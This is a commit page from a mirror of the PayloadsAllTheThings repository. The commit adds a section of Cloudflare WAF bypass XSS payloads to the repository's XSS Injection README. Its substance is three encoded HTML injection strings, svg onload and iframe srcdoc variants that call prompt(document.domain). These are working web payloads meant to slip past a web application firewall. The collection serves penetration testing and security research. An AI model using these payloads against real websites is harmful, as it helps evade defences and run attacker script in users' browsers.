Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 15:14:34 +00:00
Code Issues Projects Releases Packages Wiki Activity

Cloudflare XSS Bypasses by Bohdan Korzhynskyi

Browse source
This commit is contained in:
h1-ragnar 2019-06-05 21:36:41 +03:00 committed by GitHub
parent b031115588
commit edcac293a8
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
XSS Injection/README.md
View file

@ -876,6 +876,14 @@ Works for CSP like `script-src self`
## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
```html
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
```